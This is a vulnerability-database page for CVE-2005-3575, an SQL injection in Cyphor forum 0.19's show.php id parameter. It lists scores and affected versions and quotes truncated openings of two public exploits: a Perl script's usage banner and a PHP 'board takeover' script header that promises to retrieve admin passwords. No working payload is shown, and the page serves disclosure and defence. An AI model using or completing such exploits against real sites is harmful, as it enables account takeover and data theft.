CVE-2005-3575
published 2005-11-16CVE-2005-3575: SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP336high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.29%
66.5th percentile
SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cynox | cyphor | <= 0.19 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cyphor 0.19 - 'show.php?id' SQL Injection
exploitdb·2005-11-14
CVE-2005-3575 Cyphor 0.19 - 'show.php?id' SQL Injection
Cyphor 0.19 - 'show.php?id' SQL Injection
---
#!/bin/env perl
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] 1 #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n#####################################################\n";
exit
Exploit-DB
Cyphor 0.19 - Board Takeover (SQL Injection)
exploitdb·2005-10-08
CVE-2005-3575 Cyphor 0.19 - Board Takeover (SQL Injection)
Cyphor 0.19 - Board Takeover (SQL Injection)
---
SQL Injection:" /str0ke
#
# --- cyphor019_xpl.php 7.36 08/10/2005 #
# #
# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# send yourself any user / admin password right now! #
# #
# Sun Tzu: "There are five ways of attacking with fire. The first is to burn #
# soldiers in their camp; the second is to burn stores; the third is to burn #
# baggage trains; the fourth is to burn arsenals and magazines; the fifth is #
# to hurl dropping fire amo
No writeups or analysis indexed.
http://securityreason.com/securityalert/180http://www.osvdb.org/20983http://www.securiteam.com/unixfocus/6P00F1FEKC.htmlhttp://www.securityfocus.com/archive/1/416562http://www.securityfocus.com/bid/15418http://www.vupen.com/english/advisories/2005/2420http://securityreason.com/securityalert/180http://www.osvdb.org/20983http://www.securiteam.com/unixfocus/6P00F1FEKC.htmlhttp://www.securityfocus.com/archive/1/416562http://www.securityfocus.com/bid/15418http://www.vupen.com/english/advisories/2005/2420
2005-11-16
Published